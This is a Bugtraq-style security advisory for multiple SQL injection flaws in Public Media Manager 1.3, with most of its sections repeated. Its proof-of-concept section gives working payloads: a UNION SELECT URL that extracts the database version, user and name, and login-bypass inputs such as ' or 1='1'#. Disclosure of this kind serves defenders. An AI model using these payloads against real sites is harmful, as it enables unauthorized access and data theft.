Public Media Manager Multiple SQL Injection Vulnerabilities
BID:37797
Info
Public Media Manager Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 37797 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2010 12:00AM |
| Updated: | Jan 13 2010 12:00AM |
| Credit: | learn3r hacker |
| Vulnerable: |
Public Media Manager Public Media Manager 1.3 |
| Not Vulnerable: | |
Discussion
Public Media Manager Multiple SQL Injection Vulnerabilities
Public Media Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Public Media Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Public Media Manager Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI and data are available:
http://www.example.com/pmm-cms/NewsCMS/newsdb/fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())
Username: validuser'# [eg. admin'#]
Password: learn3r [or whatever]
Username: ' or 1='1'#
Password: learn3r [ or whatever]
Attackers can use a browser to exploit these issues.
The following example URI and data are available:
http://www.example.com/pmm-cms/NewsCMS/newsdb/fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())
Username: validuser'# [eg. admin'#]
Password: learn3r [or whatever]
Username: ' or 1='1'#
Password: learn3r [ or whatever]
Solution / Fix
Public Media Manager Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Public Media Manager Multiple SQL Injection Vulnerabilities
References:
References:
- Public Media Manager Sourceforge Page (Public Media Manager)